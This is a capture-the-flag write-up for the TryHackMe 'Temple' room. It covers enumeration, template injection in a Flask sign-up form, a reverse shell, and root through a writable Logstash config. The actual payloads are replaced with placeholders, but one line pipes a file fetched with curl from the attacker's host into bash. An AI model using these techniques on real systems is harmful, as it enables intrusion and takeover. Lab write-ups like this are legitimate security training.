---
title: Temple TryHackMe Hard
date: 2023-07-07 13:37:00 +0100
categories: [TryHackMe, Web]
tags: [flask,werkzeug,python,ctf,thm,tryhackme,ssti,pspy64]
img_path: /thm/temple/img/
image:
  src: main.png
  width: 1000   # in pixels
  height: 400   # in pixels
---

# Temple - Hard

**Category: Security, Web, Hacking, Flask**

URL: https://tryhackme.com/room/temple



# Thoughts about the challenge before starting the challenge.

When looking at the task, based on the name and the categories, it is most likely a Server-Side Template Injection (SSTI) vulnerability that will be exploited.
Python Werkzeug Flask is well known in CTFs to contain SSTI vulnerability, and the name of the challenge also hints at the T in the SSTI.
The difficulty of the challenge could be based on how hard it is to find the vulnerability, if it is hard to exploit, bypassing of filters, and as well the difficulty of the privilege escalation.


# Process for obtaining Flag1.txt:

## Open ports and services:
```
nmap -T4 -A -p- -Pn IP
7 echo: this service only echoes back what is being sent to it.
21 ftp - 22 ssh - 23 telnet: not leaking any sensitive data and would be time-consuming to brute force.
80 Apache HTTP: Not more than the default Apache site.
61337 Werkzeug HTTP: Based on the thoughts of the challenge, this is the service that most likely would contain the SSTI vulnerability and the service being tested at the highest priority.
```

When accessing the website `http://IP:61337`, we are being redirected to `/login`.
This path only contains a login form and has no functionality to access other paths.
The source code does not leak any other paths.


The login form is tested with simple SQLi and more advanced, as well as the automatization tool sqlmap without any signs of SQLi vulnerability.

## Directory and file discovery with ffuf
Next is file and directory discovery through fuzzing.
Because this is a Flask web application, the fuzzing would be done without extensions.
Initially, I would always use a short wordlist with common names.
In Kali Linux, a standard wordlist is found at `/usr/shar/wordlist/dirb/common.txt`.
This gave some results, but not what was needed. Therefore it was essential to test with other wordlists.
The other wordlists are the `SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-(small|medium|big).txt`.
As for this, I start with the smallest wordlist first and then escalate to the bigger wordlists if needed.
This was a time-consuming task at first, and it tested the patience of the enumeration process.
`The biggest tip for this process is to use FFUF and set the threads flag at a high level.`
I found that both `100 and 200 threads gave the same result`. This gave me the result after 3 minutes and 40 seconds.
If running default at the configuration of `40 threads`, this would take a lot more time. If the service is slow, it could take over an hour.
At my first attempt at fuzzing for paths, the last path was not found after one and a half hours of fuzzing.
This resulted from a slow service and a low amount of threads. 


**common.txt result:**
```
302 - /account                                              
403 - /admin                                                
302 - /application                                           
302 - /external                                             
302 - /home                                                  
302 - /internal                                            
200 - /login                                               
302 - /logout                                               
200 - /robots.txt                                            
403 - /temporary
403 - /temporary/dev
```

**SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt:**
```
200 - /temporary/dev/newacc
```

## Exploring newacc and the user portal
The endpoint found `/temporary/dev/newacc` is used to create accounts for the web application.
This only requires an `email`, `username`, and `password` where the username must be longer than `5` and the password longer than `8`.
After creating the account, we could login to the user portal, which gives access to the paths with the `302 code`.

## SSTI
Under the path `/account`, the representative account username is displayed.
This is important to test further since it could display an SSTI vulnerability.
By creating a new account with `UPDATE WITH SSTI` as username, the username displayed when logged in should display `25` if it is vulnerable.
If not, it could be filtered to bypass, or the correct field still needs to be found.


After creating an account with username `UPDATE WITH SSTI`, the account path does show `25`, which means it has an SSTI vulnerability, as expected from the name and category.
This could be exploited with os commands and reverse shell.


To get a foothold, Hacktricks is a fantastic tool with many copy-paste codes that could be pasted into the username field with some modifications to make it do what we want.
The cheat sheet for SSTI at hacktrick is found at: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection .


All the snippets from this site were tested, but all were rejected by the server as a hacking attempt.
This means we have to find other ways to bypass different filters which could be used.
For this, I found this site through Google: https://hackmd.io/@Chivato/HyWsJ31dI#RCE-bypassing-as-much-as-I-possibly-can


**The one used was this**:

`UPDATE WITH SSTI`

While this should bypass most filters, the SSTI command above was rejected.
I tested the same but changed the `'` to, `"` and this was the last bypass needed.

`UPDATE WITH SSTI`

This gave the result in the username field of the account endpoint, `bill`, which means that the `bill` user on the server is the user who owns the running service.
This would also make the reverse shell identity `bill` after successful exploitation.
For the process of gaining foothold, it is essential to start a listener.
When testing basic reverse shells, it was either reported as a hacking attempt or not giving a result to the listener.
Then I tested with a simple curl command to my IP and the listening port, which gave a hit.
This means we could create a simple bash reverse shell in a file and then open a Python server, making the curl command possible to access the file.
Therefore, changing `whoami` from the SSTI above to `curl http://IP:port/reverseshellfile|bash` would collect and execute the code.

`UPDATE WITH SSTI`

After inserting this as the username and creating the account, a reverse shell is spawned when accessing the `/account` path.
This gave foothold as `bill`, and the first flag was found under `/home/bill/flagg1.txt`.


# Useful commands for a better shell:
```
1. on the target: python3 -c 'import pty;pty.spawn("/bin/bash")'
2. on the target: export TERM=xterm
3. on the target: Ctrl + Z
4. in the same window as the target is being backgrounded: stty raw -echo; fg
5. on the target: stty rows 38 columns 116
```

This would make it possible to arrow up for earlier commands, clear to clear the terminal.
The terminal is not being exited with `CTRL + C`, making it possible to run other scripts on the target and use `CTRL + C` to exit that script and not the terminal reverse shell.


# Process for obtaining Flag2.txt:

When enumerating for privilege escalations, I always check manually at first before using auto scripts like Linpeas.
This is because some escalations could often be found faster by one or multiple commands than by a script running multiple processes to gather critical information.
For this, commands like `netstat -tvlp` to look for undiscovered open ports or locally open ports,
`find / -perm -4000 2>/dev/null` to find SUID binaries which could be abused,
check directories like `/home` for which users we could privesc to, `/opt /tmp` for abnormalities, the flask application found at `/home/bill/webapp` as well as running processes.
For running processes, I like to use `pspy64` since it would check live processes and spawning processes, which could give a cronjob run by root that could be used.
Using `ps` for running processes could miss cronjobs being executed.

## Vulnerble binary through writeable file
When using the `pspy64`, a binary: `/usr/share/logstash/jdk/bin/java` is being executed by root.
Searching for logstash at hacktricks introduces us to a privilege escalation possibility.
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/logstash


The first indicator for this vulnerability is if this file `/etc/logstash/pipelines.yml` contains `'path.config: "/etc/logstash/conf.d/*.conf"'`.
The `*` means it would use all the `.conf` files inside the path `/etc/logstash/conf.d/`. 


`pipeline.yml` on the target, which indicated what was explained above from hacktricks.
```
- pipeline.id: main
  path.config: "/etc/logstash/conf.d/*.conf"
```

The following important part of this exploit is to have write permission to the directory conf.d or a file inside.
In this case, we do not have write permission to the directory, but we have write permission to the only conf file inside the directory: `logstash-sample.conf`.
```
dr-xr-xr-x   2 root root  4096 Oct  3  2021 conf.d
-r--r--rw- 1 root root 101 Oct  4  2021 logstash-sample.conf
```

The last thing we need is a way to reload the service.
The file `/etc/logstash/logstash.yml` contains information about the config reloading automatically every third second.
This means it is possible to exploit the vulnerability.


`logstash.yml` on the target, which indicates the reloading process.
```
config.reload.automatic: true
config.reload.interval: 3s
```

By writing this code into the config file, we would copy the `/bin/bash` binary to a replica and add SUID privileges to the binary,
which means we could run this binary with the `-p` flag and have root privileges.
This code is the one found at https://book.hacktricks.xyz/linux-hardening/privilege-escalation/logstash , but with another command.


## privesc exploit:
```
PE Exploit
```

The last flag is then found at `/root/flag2.txt`.


# More information:

We got access to the bill user based on the SSTI, but there were also found two other users, `frankie` and `princess`.
After the challenge was completed, there was found a possibility to crack the `princess` password based on the hash found in `/etc/shadow`.
This was only tested with the Rockyou wordlist. This indicates that the server allows users to have bad passwords.

It is also possible to obtain access to the MySQL service.
Credentials for this service are leaked in the `/home/bill/webapp/app.py`.
